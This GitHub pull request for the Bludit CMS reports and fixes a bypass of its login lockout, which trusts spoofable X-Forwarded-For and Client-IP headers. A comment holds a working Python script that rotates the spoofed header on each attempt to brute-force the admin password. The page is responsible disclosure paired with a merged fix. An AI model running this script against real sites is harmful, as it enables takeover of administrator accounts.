Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Remove use of headers that can be used to bypass anti-brute force controls #1090

Merged

Conversation

@rastating
Copy link
Contributor

commented Oct 5, 2019

In bl-kernel/security.class.php, there is some code that will check the number of incorrect login attempts made by a host. If the host makes 10 incorrect attempts, they will be temporarily blocked in order to mitigate brute force attempts.

Due to the way the IP address detection is handled, the mechanism can be completely bypassed. The X-Forwarded-For and Client-IP headers are both checked for (presumably in order to try and detect the IP address of people behind proxies). Unfortunately, both of these headers are easily spoofed, and for an attacker that is running an automated brute force, this will make the process significantly easier than say switching between VPNs as each address gets banned.

I have included a proof of concept demo below in which you can see a total of 51 requests being made (far exceeding the limit) and successfully recovering my admin password:

asciicast

This is done by using unique X-Forwarded-For addresses for each request. As there is no validation, simply using the value of the password being attempted will work, allowing for a brute force without the risk of locking anyone out at all, as can be seen when inspecting the log file after the brute force has been completed.

Although with this change, it means users who are using a shared IP address via a proxy may be blocked if another person using the same IP is trying to brute force the login page, it will make an automated attack significantly more difficult for an attacker and require that they have multiple IP addresses that they can send traffic from.

…trols
@rastating

This comment has been minimized.

Copy link
Contributor Author

commented Oct 5, 2019

If you'd like to test this yourself, the script I wrote to run the test in the recording can be found below. It requires you to set the host and username variables at the top of the script and to replace adminadmin with whatever password you intend to test against:

#!/usr/bin/env python3
import re
import requests

host = 'http://192.168.194.146/bludit'
login_url = host + '/admin/login'
username = 'admin'
wordlist = []

# Generate 50 incorrect passwords
for i in range(50):
    wordlist.append('Password{i}'.format(i = i))

# Add the correct password to the end of the list
wordlist.append('adminadmin')

for password in wordlist:
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

    print('[*] Trying: {p}'.format(p = password))

    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break
@dignajar

This comment has been minimized.

Copy link
Member

commented Oct 5, 2019

Thank you for your explanation and the fix for the vulnerability. I would like to have more people like you.

@dignajar dignajar merged commit bee66af into bludit:master Oct 5, 2019
@rastating

This comment has been minimized.

Copy link
Contributor Author

commented Oct 5, 2019

You're welcome! Us open-source folk have to look out for one another, right? 😃

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
2 participants
You can’t perform that action at this time.